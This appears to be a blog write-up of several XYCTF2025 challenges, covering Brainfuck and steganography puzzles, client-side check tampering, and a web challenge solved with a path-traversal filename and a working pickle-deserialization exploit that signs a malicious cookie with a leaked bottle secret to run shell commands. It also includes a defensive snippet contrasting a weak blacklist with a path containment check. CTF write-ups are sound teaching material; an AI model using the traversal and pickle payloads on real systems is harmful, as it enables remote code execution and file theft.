XYCTF2025: Working Through Some Challenges After the Contest

Catching up on a few challenges and writing up part of them.

MISC

Sign-in (签个到吧)

>+++++++++++++++++[<++++++>-+-+-+-]<[-]>++++++++++++[<+++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++[<+++>-+-+-+-]<[-]>++++++++++++[<+++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<++++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++[<++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>++++++++++++[<+++++++>-+-+-+-]<[-]>++++++++++[<+++++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>++++++++++[<+++++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++[<++++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++[<++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++[<+++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<++++>-+-+-+-]<[-]>+++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++++++++++[<+++++>-+-+-+-]<[-]

This is clearly Brainfuck code. Going by how Brainfuck commands map to C:

Brainfuck    C
>            ++ptr;
<            --ptr;
+            ++*ptr;
-            --*ptr;
.            putchar(*ptr);
,            *ptr = getch();
[            while (*ptr) {
]            }

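The code contains many [-] sequences, each of which zeroes the current cell and so wipes the value that was just computed. So try printing before the clear, i.e. replace each [-] with .[-], and look at the output:
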
flag{W3lC0me_t0_XYCTF_2025_Enj07_1t!}

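Manbo Manbo Manbo (曼波曼波曼波)

The attachment contains an image and a text file. The image is a QR code that scans to fake_flag and carries no useful information. The txt file holds something that looks like base64, except that the padding equals signs are at the very start. So reverse the content and then decode it, which yields an image.

That image has an archive hidden inside it; extracting it gives an image and another archive. There is also a hint saying the password is the competition name plus the year.

The extracted image looks the same as the earlier one but differs in size. Guessing a blind watermark, extract it to get the flag.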

WEB

ez_puzzle

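F12 does not open the developer tools, but they can be opened from "More tools" next to the browser's address bar.

The code is obfuscated, but it contains a function named checkIfFinish. Change its return value to 1 (by intercepting and modifying the response with a proxy tool), then click a puzzle piece to get the flag.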

Signin

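Source code audit. The /secret route contains a get_cookie call, which invokes pickle deserialization.

So the secret used there has to be read first. The /download route does not allow the filename to start with /../, nor to contain \ or two consecutive ../. Directory traversal therefore uses the ./../ form.
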
http://***/download?filename=./.././../secret.txt
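
Why that filename gets through, as an added example that is not the challenge's source: weak_filter is reconstructed from the description above (an assumption), and safe_resolve is a containment check a /download handler could use instead. The directory layout and the file name logo.png are constructed for the demonstration.

```python
import os
import tempfile

def weak_filter(filename: str) -> bool:
    """Blacklist reconstructed from the write-up's description (assumption,
    not the challenge's source): True means the request is let through."""
    if filename.startswith("/../"):
        return False
    if "\\" in filename:
        return False
    if "../../" in filename:
        return False
    return True

def safe_resolve(base_dir: str, filename: str):
    """Resolve filename under base_dir; return the real path only if it
    stays inside base_dir, otherwise None."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:  # e.g. paths on different drives on Windows
        inside = False
    return target if inside else None

def demo():
    # Constructed layout (hypothetical): files are served from
    # <root>/app/static and secret.txt sits two levels up, in <root>.
    root = tempfile.mkdtemp()
    static = os.path.join(root, "app", "static")
    os.makedirs(static)
    names = ["logo.png", "../../secret.txt", "./.././../secret.txt"]
    # For each name: (passes the blacklist?, stays inside the served root?)
    return {n: (weak_filter(n), safe_resolve(static, n) is not None)
            for n in names}

if __name__ == "__main__":
    for name, (blacklist_ok, contained) in demo().items():
        print(f"{name!r}: blacklist passes={blacklist_ok}, inside root={contained}")
```

The blacklist matches substrings of the raw input, while the containment check compares the normalized result against the served root, so the interleaved ./ segments make no difference to it.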

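Then build a PoC to get the directory listing (since the output is not echoed back, write the result to a file first and then read that file through the /download route):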

```python
from bottle import Bottle, request, response, redirect, static_file, run, route
import requests

# Cookie-signing secret read from secret.txt via /download
secret = 'Hell0_H@cker_Y0u_A3r_Sm@r7'

class Email():
    # pickle calls __reduce__ when serializing; the server evaluates the result on load
    def __reduce__(self):
        return (eval, ("__import__('os').popen('ls / > /name').read()",))

# Have bottle pickle and sign the object, producing the cookie value used below
response.set_cookie("name", {"name": Email()}, secret=secret)
# print(response)

s = requests.Session()
# Send the signed cookie to /secret, where get_cookie unpickles it
s.get("http://***/secret", cookies={"name": "!KuTZWGXqeoroxwNIGMiyBE1PBqmJqZ1BCGypqOzUuGo=?gAWVWQAAAAAAAABdlCiMBG5hbWWUfZRoAYwIYnVpbHRpbnOUjARldmFslJOUjC1fX2ltcG9ydF9fKCdvcycpLnBvcGVuKCdscyAvID4gL25hbWUnKS5yZWFkKCmUhZRSlHNlLg=="})
```

Finally, read that file's contents through /download again.


Permalink: http://blog.ac1liu.tech/p/6c47b3eb.html
Published: June 23, 2025